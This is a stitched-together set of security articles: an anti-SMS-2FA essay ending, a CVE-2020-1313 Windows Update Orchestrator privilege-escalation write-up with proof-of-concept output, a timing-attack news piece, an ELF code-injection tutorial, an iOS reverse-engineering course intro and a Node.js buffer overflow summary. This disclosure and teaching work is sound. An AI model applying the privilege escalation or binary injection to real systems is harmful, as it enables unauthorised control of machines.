This perfectly eliminates credential stuffing, but won’t eliminate phishing (but neither will SMS-2FA).

If you also want to eliminate phishing, you have two excellent options. You can either educate your users on how to use a password manager, or deploy U2F, FIDO2, WebAuthn, etc. This can be done with hardware tokens or a smartphone.

If neither of those two options appeal to you, that doesn’t mean you should deploy SMS-2FA, because SMS-2FA doesn't work.

Minor arguments in favor of SMS-2FA

- SMS-2FA makes the login process slower, and that gives users more time to think about security.

This idea is patently absurd. However, if you genuinely believe this, you don’t need SMS-2FA. A simple protocol that will make login slower is to split the login process, first requesting the username and then the password.

When you receive the username, mint a signed and timestamped token and add it to a hidden form field. You can then pause before allowing the token to be submitted and requesting another token that must accompany the password.

This is far simpler than integrating SMS, as you can just modify the logic you are already using to protect against XSRF. If you are not already protecting against XSRF, my advice would be to fix that problem before implementing any dubious “slower is better” theories.

- Attackers vary in ability, and some will not be able to upgrade their scripts.

If you can purchase and install one kit, it is pretty reasonable to assume that you are capable of purchasing and installing another. The primary barrier here is the cost of upgrading, not hacking ability.

When adoption is high enough that it’s possible to recoup those costs, phishers will certainly upgrade.

- Don’t let the perfect be the enemy of the good.
- Seat belts aren’t perfect either, do you argue we shouldn’t wear them?
- Etc, etc.

This argument only works if what you’re defending is good. As I’ve already explained, SMS-2FA is not good.

Unique Passwords and U2F are not perfect, but they are good. Unique Passwords reduce the impact of phishing, but can’t eliminate it. U2F doesn’t prevent malware, but does prevent phishing.

- A phishing kit that implements SMS-2FA support is more complex than one that doesn’t.

That’s true, but this complexity can be hidden from the phisher. I don’t know anything about audio processing, but I can still play MP3s. I simply purchased the software and hardware from someone who does understand those topics.

- What about "SIM swapping" attacks?

SIM swapping attacks are a legitimate concern, but if that was the only problem with SMS-2FA, my opinion is that would not be enough to dismiss it.

-

CVE-2020-1313

Abstract

Windows Update Orchestrator Service (USO) is a DCOM service used by other components to install Windows updates that are already downloaded. USO was vulnerable to elevation of privilege (any user to local system) due to improper authorization of its callers. The vulnerability affected the Windows 10 and Windows Server Core products. Microsoft fixed it on Patch Tuesday, June 2020.

The vulnerability



The

UniversalOrchestratorservice (9C695035-48D2-4229-8B73-4C70E756E519), implemented inusosvc.dllis running asNT_AUTHORITY\SYSTEMand is configured with access permissions forBUILTIN\Users(among others). Even though enumeration of the COM classes implemented by this service is blocked (OLEView.NET: Error querying COM interfaces - ClassFactory cannot supply requested class), theIUniversalOrchestratorinterface (c53f3549-0dbf-429a-8297-c812ba00742d) - as exposed by the proxy defintion - can be obtained via standard COM API calls. The following 3 methods are exported:virtual HRESULT __stdcall HasMoratoriumPassed(wchar_t* uscheduledId, int64_t* p1);//usosvc!UniversalOrchestrator::HasMoratoriumPassed virtual HRESULT __stdcall ScheduleWork(wchar_t* uscheduledId, wchar_t* cmdLine, wchar_t* startArg, wchar_t* pauseArg);//usosvc!UniversalOrchestrator::ScheduleWork virtual HRESULT __stdcall WorkCompleted(wchar_t* uscheduledId, int64_t p1);//usosvc!UniversalOrchestrator::WorkCompletedThe





ScheduleWorkmethod can be used to schedule a command to be executed in the context of the service and can be done without any authorization of the requestor. Though the target executable itself must be digitally signed and located underc:\windows\system32or common files inProgram Files, command line arguments can be specified as well. This makes it possible to launchc:\windows\system32\cmd.exeand gain arbitrary code execution this way underNT_AUTHORITY\SYSTEMmaking this issue a local privilege escalation.The work is "scheduled", it is not kicked off immediately.

Proof of Concept

The PoC I created configures a "work" with cmdLine c:\windows\system32\cmd.exe and parameters: /c "whoami > c:\x.txt & whoami /priv >>c:\x.txt"

Executing it:

    C:\111>whoami
    desktop-43rnlku\unprivileged

    C:\111>whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                          State
    ============================= ==================================== ========
    SeShutdownPrivilege           Shut down the system                 Disabled
    SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
    SeUndockPrivilege             Remove computer from docking station Disabled
    SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
    SeTimeZonePrivilege           Change the time zone                 Disabled

    C:\111>whoami /priv

    C:\111>UniversalOrchestratorPrivEscPoc.exe
    Obtaining reference to IUniversalOrchestrator
    Scheduling work with id 56594
    Succeeded. You may verify HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler to see the task has indeed been onboarded. The command itself will be executed overnight if there is no user interaction on the box or after 3 days SLA has passed.

An entry about the scheduled work is added to the registry:

The specified command is executed overnight (around 23:20) when no user interaction is expected, or after 3 days of SLA has passed.

How was this issue found?

When I couldn't obtain the interface definition of the USO service with OleView.NET, I created a script to go through hundreds of CLSID/IID combinations that I expected to work at some level. It looked something like this:

    void TestUpdateOrchestratorInterfaceAgainstService(IID& clsId, const char* className, const wchar_t* iidStr, const char *interfaceName)
    {
        void *ss = NULL;
        IID iid;
        ThrowOnError(IIDFromString(iidStr, (LPCLSID)&iid)); // working with e at the end, failing with anything else
        HRESULT res = CoCreateInstance(clsId, nullptr, CLSCTX_LOCAL_SERVER, iid, (LPVOID*)&ss);
        printf("%s %s: %s\n", className, interfaceName, res == S_OK ? "WORKING" : "failure");
    }

    void TestUpdateOrchestratorInterface(const wchar_t* iidStr, const char *interfaceName)
    {
        // TestUpdateOrchestratorInterfaceAgainstService(CLSID_AutomaticUpdates, "AutomaticUpdates", iidStr, interfaceName); // timeouting!
        TestUpdateOrchestratorInterfaceAgainstService(CLSID_UxUpdateManager, "UxUpdateManager", iidStr, interfaceName);
        TestUpdateOrchestratorInterfaceAgainstService(CLSID_UsoService, "UsoService", iidStr, interfaceName);
        TestUpdateOrchestratorInterfaceAgainstService(CLSID_UpdateSessionOrchestrator, "UpdateSessionOrchestrator", iidStr, interfaceName);
        TestUpdateOrchestratorInterfaceAgainstService(CLSID_UniversalOrchestrator, "UniversalOrchestrator", iidStr, interfaceName);
        // TestUpdateOrchestratorInterfaceAgainstService(CLSID_SomeService, "SomeService", iidStr, interfaceName); // timeouting!
    }

    ...
    TestUpdateOrchestratorInterface(L"{c57692f8-8f5f-47cb-9381-34329b40285a}", "IMoUsoOrchestrator");
    TestUpdateOrchestratorInterface(L"{4284202d-4dc1-4c68-a21e-5c371dd92671}", "IMoUsoUpdate");
    TestUpdateOrchestratorInterface(L"{c879dd73-4bd2-4b76-9dd8-3b96113a2130}", "IMoUsoUpdateCollection");
    // ... and hundreds of more

The result of the approach was:

    UniversalOrchestrator IUniversalOrchestrator: WORKING
    UpdateSessionOrchestrator IUpdateSessionOrchestrator: WORKING
    UxUpdateManager IUxUpdateManager: WORKING

Then I started reverse engineering the implementation and found the flow described above.

The fix



Microsoft fixed this issue on Patch Tuesday June 2020 by adding the missing CoImpersonateClient API call.

Implementation before the fix applied:

Implementation after the fix applied:

How does this help? Impersonation is done at the beginning of processing the request, so the API calls to update the registry are executed in the caller's security context. If the caller has no privilege on HKEY_LOCAL_MACHINE, the uso API method will fail accordingly.

Credits

More info

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1313

-

Researchers exploit HTTP/2, WPA3 protocols to stage highly efficient ‘timeless timing’ attacks

Ben Dickson 30 July 2020 at 12:31 UTC

Updated: 30 July 2020 at 13:54 UTC

New hacking technique overcomes ‘network jitter’ issue that can impact the success of side-channel attacks

Malicious actors can take advantage of special features in network protocols to leak sensitive information, a new technique developed by researchers at Belgium’s KU Leuven and New York University Abu Dhabi shows.

Presented at this year’s Usenix conference, the technique, named ‘Timeless Timing Attacks’, exploits the way network protocols handle concurrent requests to solve one of the endemic challenges of remote timing side-channel attacks.

The challenges of remote timing attacks

Timing attacks measure differences in computation times between different commands in attempts to get past the protection offered by encryption and infer clues about sensitive information such as encryption keys, private conversations, and browsing habits.

But to successfully stage timing attacks, an attacker needs precise knowledge of the time it takes for the targeted application to process a request.

This turns into a problem when targeting remote systems such as web servers, as network delay – the jitter – causes variations in the response time that makes it difficult to calculate the processing time.

In remote timing attacks, assailants usually send each command multiple times and perform statistical analysis on the response times to reduce the effects of the network jitter. But this technique only works to a degree.

“The smaller the timing difference, the more requests are needed, and at some point it becomes infeasible,” Tom Van Goethem, security researcher at KU Leuven and lead author of the timeless attack paper, told The Daily Swig.

Timeless timing attack

The technique developed by Van Goethem and his colleagues performs remote timing attacks in a way that cancels the effect of the network jitter.

The idea behind the timeless timing attack is simple: Make sure the requests reach the server at the exact same time instead of sending them sequentially.

Concurrency ensures that both requests enjoy the same network conditions and their performance is unaffected by the path between the attacker and the server. Afterward, the order in which the responses arrive will give you all the information you need to compare computation times.

“The main advantage of the timeless timing attacks is that these are much more accurate, so much fewer requests are needed. This allows an attacker to detect differences in execution time as small as 100ns,” Van Goethem says.

The smallest timing difference that the researchers had observed in a traditional timing attack over the internet was 10μs, 100 times higher than the concurrent request-based attack.
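Why request ordering beats stopwatch timing can be seen in a small simulation. The Python sketch below is not the researchers' code: the base processing time, the 10μs network jitter, the 200ns server-side noise and all function names are assumptions chosen for illustration, and it ignores reordering on the return path. It compares a classic attack, where every request picks up its own jitter, with a paired attack, where both requests arrive together and only the completion order is observed.

```python
import random

BASE_NS = 50_000.0  # assumed nominal processing time on the server


def sequential_attack(rng, extra_ns, jitter_ns, samples):
    """Classic remote timing: each request is timed on its own, so every
    measurement carries independent network jitter. Returns True when the
    slower operation is correctly identified from the summed timings."""
    slow = sum(BASE_NS + extra_ns + rng.gauss(0, jitter_ns) for _ in range(samples))
    fast = sum(BASE_NS + rng.gauss(0, jitter_ns) for _ in range(samples))
    return slow > fast


def timeless_attack(rng, extra_ns, jitter_ns, server_noise_ns, pairs):
    """Paired requests: both arrive at the same instant, so the network
    jitter is shared and cancels out. Only the order of completion is used."""
    slow_finished_last = 0
    for _ in range(pairs):
        arrival = rng.gauss(0, jitter_ns)  # identical for both requests
        done_slow = arrival + BASE_NS + extra_ns + rng.gauss(0, server_noise_ns)
        done_fast = arrival + BASE_NS + rng.gauss(0, server_noise_ns)
        if done_slow > done_fast:
            slow_finished_last += 1
    return slow_finished_last > pairs / 2


def accuracy(attack, trials, **params):
    """Fraction of independent trials in which the attack guesses correctly."""
    rng = random.Random(1234)
    return sum(attack(rng, **params) for _ in range(trials)) / trials


if __name__ == "__main__":
    seq = accuracy(sequential_attack, 300, extra_ns=100, jitter_ns=10_000, samples=50)
    par = accuracy(timeless_attack, 300, extra_ns=100, jitter_ns=10_000,
                   server_noise_ns=200, pairs=50)
    print(f"sequential timing accuracy: {seq:.2f}")
    print(f"paired ordering accuracy:   {par:.2f}")
```

With these assumed parameters, the sequential attack is close to a coin flip for a 100ns difference, while the paired attack identifies the slower operation in the large majority of trials using the same number of requests.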

How to ensure concurrency

“The way we ensure [concurrency] is indeed by ensuring that both requests are placed in a single network packet,” Van Goethem says, adding, “How it works exactly in practice mainly depends on the network protocol.”

To send concurrent requests, the researchers exploit capabilities in different network protocols.

For instance, HTTP/2, which is fast becoming the de-facto standard in web servers, supports ‘request multiplexing’, a feature that allows a client to send multiple requests in parallel over a single TCP connection.

“[For HTTP/2], we just need to make sure that both requests are placed in a single packet (e.g. by writing both to the socket at once),” Van Goethem explains.

There are some caveats, however. For example, with most content delivery networks such as Cloudflare, which powers a large portion of the web, the connection between the edge servers and the origin site is over HTTP/1.1, which does not support request multiplexing.


Although this decreases the effectiveness of the timeless attack, it is still more precise than classic remote timing attacks because it removes the jitter between the attacker and the CDN edge server.

For protocols that do not support request multiplexing, the attackers can use an intermediate network protocol that encapsulates requests.

The researchers go on to show how timeless timing attacks work on the Tor network. In this case, the attackers encapsulate multiple requests in a Tor cell, the packet that is encrypted and passed on between nodes in the Tor network in single TCP packets.

“Because the Tor circuit for onion services goes all the way to the server, we can ensure that the requests will arrive at the same time,” Van Goethem says.

Timeless attacks in practice

In their paper, the security researchers explore timeless attacks in three different settings.

In direct timing attacks, the malicious actor directly connects to the server and tries to leak secret, application-specific information.

“As most web applications are not written with the idea in mind that timing attacks can be highly practical and accurate, we believe many websites are susceptible to timing attacks,” Van Goethem says.

In cross-site timing attacks, the attacker triggers requests to other websites from a victim’s browser and infers private information by observing the sequence of responses.

The attackers used this scheme to exploit a vulnerability in the HackerOne bug bounty programme and extract information such as keywords used in private reports about unfixed vulnerabilities.

“I looked for cases where a timing attack was previously reported but was not considered effective,” Van Goethem says.


“In case of the HackerOne bug, it was already reported at least three times (bug IDs #350432, #348168, and #4701), but was not fixed, as the attack was considered infeasible to exploit. I then created a basic PoC with the timeless timing attacks.

“At that time, it was still highly unoptimized as we were still figuring out the details of the attack, but nevertheless it seemed to be quite accurate (on my home WiFi connection, I managed to get very accurate results).”

The researchers also tried timeless attacks on the WPA3 WiFi protocol.

Mathy Vanhoef, one of the co-authors of the paper, had previously discovered a potential timing leak in WPA3’s handshake protocol. But the timing was either too small to exploit on high-performance devices or could not be exploited against servers.

“With the new timeless timing attacks, we show that it is in fact possible to exploit the WiFi authentication handshake (EAP-pwd) against servers, even if they use performant hardware,” Van Goethem says.

Perfect timing

In their paper, the researchers provide guidelines to protect servers against timeless attacks such as setting constant-time and random padding constraints on execution time. Practical, low-impact defenses against direct timing attacks require further research.
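The article does not spell out the paper's guidelines, so the following is not the researchers' method. It is a small Python illustration of the general idea behind a constant-time constraint: a comparison that stops at the first mismatching byte does an amount of work that depends on the secret, which is exactly the kind of difference a timing attack measures, whereas `hmac.compare_digest` from the standard library is designed to avoid that. The helper names `leaky_equal` and `constant_time_equal` are hypothetical.

```python
import hmac


def leaky_equal(secret: bytes, guess: bytes):
    """Early-exit comparison. Returns (equal, bytes_examined) so the
    data-dependent amount of work is visible without a stopwatch."""
    if len(secret) != len(guess):
        return False, 0
    examined = 0
    for secret_byte, guess_byte in zip(secret, guess):
        examined += 1
        if secret_byte != guess_byte:
            return False, examined
    return True, examined


def constant_time_equal(secret: bytes, guess: bytes) -> bool:
    """Comparison whose running time does not depend on where the
    inputs differ (standard-library helper)."""
    return hmac.compare_digest(secret, guess)


if __name__ == "__main__":
    secret = b"secret"
    for guess in (b"xecret", b"sexret", b"secreX"):
        equal, examined = leaky_equal(secret, guess)
        print(guess, "leaky work:", examined, "constant-time result:",
              constant_time_equal(secret, guess))
```

The number of bytes examined by the leaky version grows with the length of the correct prefix, which lets an attacker recover a secret one byte at a time if the difference is measurable.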

“We believe that this line of research is still in the early stages, and much is yet to be explored,” Van Goethem said.

Future research directions could include exploring other techniques that could be used to perform concurrent timing attacks, other protocols and intermediate network layers that can be targeted, and assessing the vulnerability of popular websites that allow such testing under a bug bounty.

The name “timeless” was chosen “because in the attacks we do not use any (absolute) timing information,” Van Goethem said.

“‘Timeless’ is also a play on the idea that (remote) timing attacks have been around for quite a while, and based on our findings, they will likely only get worse and are here to stay.”


-

Injecting code into 32bit binary with ASLR

Porting the example from the "Practical Binary Analysis" book to a more general case

Disclaimer: I am currently reading the PBA book, so this refers to the content presented there. The code can nonetheless be obtained freely. This "article" started mostly as personal notes, which I have decided to publish since I think it could help people starting in this field. I will assume you are reading or own the book and can therefore cross-reference this content with it.

Introduction

The book illustrates various methods to inject assembly code into an ELF file. It also provides a small tool (elfinject.c) to automate the process. In particular, we will use the "primary" method, which overwrites an existing section header that is not essential for the correct execution of the ELF (in our case .note.ABI-tag), along with the corresponding entry in the program header.

The objective is to inject a simple "Hello world" into /bin/ls without breaking it (meaning that ls should keep working as expected). For more details you should read the book.

Since I assume this method has already been presented many times, and in better ways, the point of this article (and what might be useful about it) is to show the reasoning that led to solving the problem.

The problem

The book already presents a tool called elfinject.c, which automates the task. Peeking at the source code, it should also work on 32-bit ELF files. But, as in most articles, the example provided does not take ASLR into consideration. Furthermore, the assembly code is for the x64 architecture.

I will assume zero knowledge about the presence and functioning of ASLR.

The machine I am working with is a virtualized Ubuntu (not the one used for the book), with the default configuration and no safety measures turned off.

michele@michele-VirtualBox:~/pba/code/chapter7$ uname -a

Linux michele-VirtualBox 4.15.0-111-generic #112-Ubuntu SMP Thu Jul 9 20:36:22 UTC 2020 i686 i686 i686 GNU/Linux

Obviously, just running the example does not work. The first problem we have to face is the wrong assembly code. The provided hello world assembly file is the following:

    BITS 64

    SECTION .text
    global main

    main:
      push rax                ; save all clobbered registers
      push rcx                ; (rcx and r11 destroyed by kernel)
      push rdx
      push rsi
      push rdi
      push r11

      mov rax,1               ; sys_write
      mov rdi,1               ; stdout
      lea rsi,[rel $+hello-$] ; hello
      mov rdx,[rel $+len-$]   ; len
      syscall

      pop r11
      pop rdi
      pop rsi
      pop rdx
      pop rcx
      pop rax

      push 0x4049a0           ; jump to original entry point
      ret

    hello: db "hello world",33,10
    len : dd 13

The solution

Here's my 32bit version of the hello world assembly file:

    BITS 32

    SECTION .text
    global main

    main:
      push ecx
      push edx
      push esi
      push edi

      mov ebx,1               ; stdout ARG0 for x86 32bit
      mov ecx, [esp]
      lea ecx, [ecx + hello]
      mov edx, [esp]
      mov edx, [edx + len]
      mov eax,4
      int 0x80

      mov eax, [esp]
      sub eax, 0x411772

      pop edi
      pop esi
      pop edx
      pop ecx

      jmp eax

    hello: db "hello world",33,10
    len : dd 13

Let's take a look at the new hello32.s. It starts with BITS 32, which is the obvious first change. The next change is in the registers saved:

    push ecx
    push edx
    push esi
    push edi

Indeed, 32-bit x86 has none of the 64-bit registers: neither the r-prefixed versions of the classic registers (rax, rcx, ...) nor the numbered ones (r8 to r15). I don't save eax; the reason will become clear later.

The second important problem was the system call instruction. 32-bit x86 does not use syscall, so I had to use int 0x80. This also requires a different way to:

1. provide the arguments

2. choose the number of the system call (with respect to the x64 example).

We cannot simply replace the 64-bit registers with their 32-bit counterparts, because the registers used to pass the arguments are different. Furthermore, the system call number associated with write is not 1 but 4.
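The two conventions can be put side by side. The sketch below is only an illustration in Python: the table layout and the helper name `registers_for` are made up for this example, while the register assignments and the write numbers are those of the Linux x86-64 `syscall` and i386 `int 0x80` conventions.

```python
# Linux system call conventions, written out as plain data.
CONVENTIONS = {
    "x86-64 (syscall)": {
        "number_register": "rax",
        "argument_registers": ["rdi", "rsi", "rdx", "r10", "r8", "r9"],
        "write": 1,
    },
    "i386 (int 0x80)": {
        "number_register": "eax",
        "argument_registers": ["ebx", "ecx", "edx", "esi", "edi", "ebp"],
        "write": 4,
    },
}


def registers_for(convention, syscall, args):
    """Return the register -> value assignment that must be in place
    before the trap instruction is executed."""
    abi = CONVENTIONS[convention]
    assignment = {abi["number_register"]: abi[syscall]}
    for register, value in zip(abi["argument_registers"], args):
        assignment[register] = value
    return assignment


if __name__ == "__main__":
    # write(fd=1, buf=hello, count=13) under both conventions
    for name in CONVENTIONS:
        print(name, registers_for(name, "write", [1, "hello", 13]))
```

This is why the 32-bit listing loads ebx, ecx and edx where the 64-bit one used rdi, rsi and rdx, and puts 4 rather than 1 in the accumulator.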

Another issue concerned the addresses of the strings. Simply porting the provided code did not work, because the memory being pointed to (for example, for the string hello) was not being updated, or correctly referenced relative to the address. So, to reference it correctly, I had to use a little trick:

    mov ecx, [esp]
    lea ecx, [ecx + hello]
    mov edx, [esp]
    mov edx, [edx + len]

This makes sure that at runtime the addresses of the string and of its size are correct, no matter how we modify the source.

Another issue encountered was the presence of ASLR. As I said, I will assume zero knowledge about it and about how to work around it. Reading the ls headers with readelf, the binary is reported as a shared object:

    michele@michele-VirtualBox:~/pba/code/chapter7$ readelf /bin/ls -h
    ELF Header:
      Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
      Class: ELF32
      Data: 2's complement, little endian
      Version: 1 (current)
      OS/ABI: UNIX - System V
      ABI Version: 0
      Type: DYN (Shared object file)

After a bit of exploration, we can see that the addresses shown by readelf (e.g. the entry point) and the ones actually loaded in memory are different. This can be quite annoying for debugging.

    …
      Entry point address: 0xfad
    …

This address does not correspond to the real virtual address of the entry point. We can verify it with gdb:

    ...
    (gdb) b *0xfad
    Breakpoint 1 at 0xfad
    (gdb) r
    Starting program: /bin/ls
    Warning:
    Cannot insert breakpoint 1.
    Cannot access memory at address 0xfad

Luckily for us, after having run the binary we can obtain the real address:

    (gdb) info file
    Symbols from "/bin/ls".
    Native process:
      Using the running image of child process 14081.
      While running this, GDB does not access memory from...
    Local exec file:
      `/bin/ls', file type elf32-i386.
      Entry point: 0x403f86

At this point, one could think that doing a jmp to 0x403f86 (at the end of our assembly code) would work:

    push 0x403f86
    ret

Unfortunately, this works only within gdb and crashes when run from the terminal. We can speculate that the address handling might be different in these two contexts. So we want a relative jump from the position of the code to the original entry point, assuming this distance is fixed.

We can find the distance by debugging, and then we can implement a relative jump, with a method similar to the one used for the data addresses:

    mov eax, [esp]
    sub eax, 0x411772
    ...
    jmp eax

An important thing to keep in mind is to do the pops after you have used the [esp] value, because otherwise addressing [esp] does not provide the correct address.

After all these modifications, we are finally able to inject and run from the terminal. After having copied /bin/ls to ls_mod, we assemble the file with the -f bin flag, and we inject it.

    nasm -f bin hello32.s -o hello32.bin
    ./elfinject ls_mod hello32.bin ".injected" 0x00415180 0
    michele@michele-VirtualBox:~/pba/code/chapter7$ ./ls_mod
    hello world!
    elfinject heapoverflow.c hello-ctor.s hello-got.s new_headers shell.c
    elfinject.c hello32.bin hello_fixed2_32.bin hello.s original_headers
    encrypted hello.bin hello_fixed32.bin ls_mod shell_asm.bin
    heapcheck.c hello-ctor.bin hello-got.bin Makefile shell_asm.s

As we can see, running our injected binary provides both the Hello World and its normal output.

More resources - what is going on?

What is happening is that due to ASLR, the addresses are being randomized. You can find more details here.

Debugging the binary with gdb disables ASLR. This is why we always get the same "original" entry point with gdb, and also why the injection would work without a relative jump. ASLR can be re-enabled in gdb with set disable-randomization off.
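The mismatch between the entry point printed by readelf and the one seen at runtime comes down to two header fields, which can also be read directly from the file. A minimal sketch in Python, assuming only the standard ELF header layout (the function name `read_elf_type_and_entry` is hypothetical): for a DYN file, the entry value is an offset from a load base chosen at run time, not an absolute address.

```python
import struct
import sys

# e_type values defined by the ELF specification
ET_NAMES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def read_elf_type_and_entry(header: bytes):
    """Parse e_type and e_entry from the first bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is_64bit = header[4] == 2                 # EI_CLASS: 1 = ELF32, 2 = ELF64
    endian = "<" if header[5] == 1 else ">"   # EI_DATA: 1 = little endian
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    # e_entry sits at offset 24 in both classes; only its width differs
    (e_entry,) = struct.unpack_from(endian + ("Q" if is_64bit else "I"), header, 24)
    return ET_NAMES.get(e_type, hex(e_type)), e_entry


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "/bin/ls"
    with open(path, "rb") as binary:
        elf_type, entry = read_elf_type_and_entry(binary.read(64))
    print(f"{path}: type={elf_type} entry={entry:#x}")
    if elf_type == "DYN":
        print("entry is relative to a load base chosen at run time")
```

On a binary like the ls used here, this would be expected to report the DYN type together with the small entry value that readelf printed.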

The binary was listed as a shared object because compiling with ASLR support enabled produces a PIE (Position-Independent Executable) binary.

-

Reverse Engineering iOS Applications

Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest for application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂

All the vulnerabilities that I'll show you here are real, they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is that most companies prohibit the publication of such content. We've helped these companies by reporting these issues to them and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course, by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed at teaching you common issues in iOS applications, I felt like we needed one that showed the kind of vulnerabilities we've seen in applications downloaded from the App Store.

This course is divided into 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success.

This is my first attempt at creating an online course so bear with me if it's not the best. I love feedback and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b!

If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn!

Version: 1.1

Modules

- Prerequisites

- Introduction

- Module 1 - Environment Setup

- Module 2 - Decrypting iOS Applications

- Module 3 - Static Analysis

- Module 4 - Dynamic Analysis and Hacking

- Module 5 - Binary Patching

- Final Thoughts

- Resources

EPUB Download

Thanks to natalia-osa's brilliant idea, there's now a .epub version of the course that you can download from here. As Natalia mentioned, this is for easier consumption of the content. Thanks again for this fantastic idea, Natalia 🙏🏼.

License

Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com>

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Donations

I don't really accept donations because I do this to share what I learn with the community. If you want to support me just re-share this content and help reach more people. I also have an online store (nullswag.com) with cool clothing thingies if you want to get something there.

Disclaimer

I created this course on my own and it doesn't reflect the views of my employer, all the comments and opinions are my own.

Disclaimer of Damages

Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party, for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk"; I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. This limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages.

Privacy

I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read.

[^1] I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser, you get to understand the static code (HTML/Javascript) of the website but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company who created the application or its end users.

-

Discovering Buffer overflows in NodeJS core

Jul 30 · 3 min read

Summary

Node.js is a relatively new entrant in the programming world. It allows JavaScript (which is normally executed only in web browsers) to run outside the browser.

A popular example of software built on Node.js is the Electron framework, which is used by WhatsApp, Twitch, Microsoft Teams, Slack, Discord and several other applications. Even NASA uses Node.js to export data from its extravehicular activity (EVA) spacesuits.

A security researcher by the name of Tobias Nießen discovered a buffer overflow vulnerability in several of Node.js's built-in functions.

CVE-2020-8174

On Jan 27th 2020, Tobias noticed that the Node.js functions napi_get_value_string_latin1, napi_get_value_string_utf8 and napi_get_value_string_utf16 were not properly handling their input, resulting in memory corruption.

He quickly reported it through the Node.js public bug bounty program and was rewarded 250 USD by the Internet Bug Bounty for his discovery.

The Internet Bug Bounty is an organization that pays bounties to security researchers who find vulnerabilities in software used by a large number of people, in order to make the internet a more secure place.

A day later the reported vulnerabilities were assigned the Common Vulnerabilities and Exposures ID CVE-2020-8174.

The dangers of exploitation

Buffer overflows are very common software vulnerabilities that in many cases open security holes a third party could use to corrupt memory and manipulate the program into executing malicious code.

Tobias describes the vulnerability as:

1. If the output pointer is NULL, return.

2. Write min(string_length, bufsize - 1) bytes to the output buffer. Note that bufsize is an unsigned type, so this leads to an integer underflow for bufsize == 0. Since this is a size_t, the underflow will cause the entire string to be written to memory, no matter how long the string is.

3. Finally, write to buf[copied], where copied is the number of bytes previously written. Even if step 2 hadn't written out of bounds, this would (for bufsize == 0).
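The length calculation in step 2 can be modeled in a few lines. This is only a sketch of the arithmetic, not the Node.js source: JavaScript has no size_t, so a 64-bit unsigned integer is emulated with BigInt.asUintN (the 64-bit width is an assumption about the platform), and the helper names sizeSub1, bytesCopied and bytesCopiedGuarded are hypothetical.

```javascript
// Assumption: size_t is 64 bits wide on the target platform.
const SIZE_BITS = 64;

// Emulates `bufsize - 1` evaluated in unsigned size_t arithmetic.
// For bufsize == 0 the result wraps around to 2^64 - 1.
function sizeSub1(bufsize) {
  return BigInt.asUintN(SIZE_BITS, BigInt(bufsize) - 1n);
}

// Hypothetical helper: how many bytes step 2 would copy,
// i.e. min(string_length, bufsize - 1).
function bytesCopied(stringLength, bufsize) {
  const limit = sizeSub1(bufsize);
  const len = BigInt(stringLength);
  return len < limit ? len : limit;
}

// Hypothetical guarded variant: a zero-sized buffer copies nothing.
function bytesCopiedGuarded(stringLength, bufsize) {
  if (BigInt(bufsize) === 0n) return 0n;
  return bytesCopied(stringLength, bufsize);
}

const input = 'this could be code that might later be executed';

console.log(sizeSub1(0));                         // 18446744073709551615n
console.log(bytesCopied(input.length, 0));        // 47n: the whole string
console.log(bytesCopied(input.length, 16));       // 15n: room left for the terminator
console.log(bytesCopiedGuarded(input.length, 0)); // 0n
```

With bufsize == 0 the limit becomes the largest representable value, so the minimum is always the string length and the entire string is copied. The guarded variant shows one possible way to avoid the wraparound by checking for a zero-sized buffer before subtracting.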

Security advisory

